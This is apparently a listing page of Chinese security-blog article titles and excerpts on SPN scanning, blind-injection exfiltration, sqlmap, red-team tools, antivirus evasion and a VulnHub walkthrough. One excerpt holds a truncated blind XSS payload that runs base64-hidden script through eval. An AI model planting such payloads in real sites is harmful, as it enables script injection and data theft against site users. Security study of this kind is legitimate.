一、 SPN扫描不同于常规的tcp/udp端口扫描,由于spn本质就是正常的Kerberos请求,所以扫描是非常隐蔽,日前针对此类扫描的检测暂时也比较少。大部分win系统默认已自带spn探测...
命令执行/SQL盲注无回显外带方式
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与...
Blind XSS
Payload:"><input onfocus=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCg...
Python GUI界面版端口扫描工具
转载于:行者匠心 值得分享学习学习一、结构导图二、部分代码:# 图形界面class PortScan(object): de...
常见web应用服务器分析
原文始发于微信公众号(网络安全与取证研究):常见web应用服务器分析
神兵利器——红队知识仓库(建议收藏)
网站导航编码/加密CyberChef:编解码及加密,可本地部署 https://github.com/gchq/CyberChefOK Tools在线工具:https://github.com/wan...
软件供应链安全已成为CIO最担忧的问题之一
软件供应链安全在近两年热度飙升,甲方对其的关注度也大幅提升。近日,Venafi对多达1000位来自于各个企业的CIO进行的一项新调查显示,有超过80%的受访者表示,他们所在的组织容易受到针对软件供应链...
OSCP难度靶机之WEB DEVELOPER: 1
虚拟机信息:虚拟机下载地址:https://www.vulnhub.com/entry/web-developer-1,288/虚拟机简介:获得 root 访问权限目标:1个flag级别:中级1、信息...
风流往事之 | 那些年我和[SQLmap]的爱恨情仇
sqlmap使用笔记+思维导图脑图他又长又粗🤡基本操作笔记:-u #注入点-f #指纹判别数据库类型-b #获取数据库版本信息-p #指定可测试的参数...
【技术分享】安全分析中的威胁情报(一)
背景近两个月实在太忙,这一篇博客拖到现在。本来计划开一个安全分析的系列,但因为工作原因搁置了。端午去成都吃火锅,往返飞机上写出这篇《安全分析中的威胁情报》。作为安全分析系列文章的开篇。何为威胁情报我将...
红队培训之工具开发与免杀
课程介绍 实战攻防演练越来越🔥,你是否也想在如此激烈的战斗中独树一帜?还在为bypass杀软头疼?还在通过burpsuite打漏洞?是时候提升一下自己了。...
渗透测试一些知识点
1、如果提示缺少参数,如{msg:params error},可尝使用字典模糊测试构造参数,进一步攻击。2、程序溢出,int最大值为2147483647,可尝试使用该值进行整数溢出,观察现象。3、40...
11811